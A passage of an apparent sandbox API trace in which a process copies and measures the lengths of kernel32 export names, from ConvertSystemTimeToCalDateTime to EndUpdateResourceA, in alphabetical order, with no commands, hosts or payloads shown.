(lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.002] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.002] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.002] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.002] lstrlenA (lpString="COPYFILEA") returned 9 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.002] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.002] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.002] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.003] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.003] lstrlenA (lpString="COPYFILEW") returned 9 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.003] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.003] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.003] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.003] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.003] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.003] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.003] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.003] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.003] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.003] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.003] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.003] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.003] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.003] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.003] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.003] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.003] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.004] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.004] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.004] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.004] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.004] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.004] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.004] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.004] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.004] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.004] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.004] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.004] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.004] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.004] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.004] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.004] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.004] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.004] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.005] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.005] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.005] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.005] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.005] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.005] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.005] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.005] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.005] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.005] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.005] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.005] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.005] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.005] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.005] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.005] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.005] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.005] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.006] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.006] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.006] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.006] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.006] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.006] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.006] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.006] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.006] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.006] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.006] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.006] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.006] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.006] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.006] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.006] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.006] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.006] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.007] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.007] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.007] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.007] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.007] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.007] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.007] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.007] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.007] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.007] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.007] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.007] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.007] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.007] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.007] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.007] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.007] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.007] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.008] lstrlenA (lpString="DELETEATOM") returned 10 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.008] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.008] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.008] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.008] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.008] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.008] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.008] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.008] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.008] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.008] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.008] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.008] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.008] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.008] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.008] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.008] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.008] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.008] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.008] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.009] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.009] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.009] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.009] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.009] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.009] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.009] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.009] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.009] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.009] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.009] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.009] lstrlenA 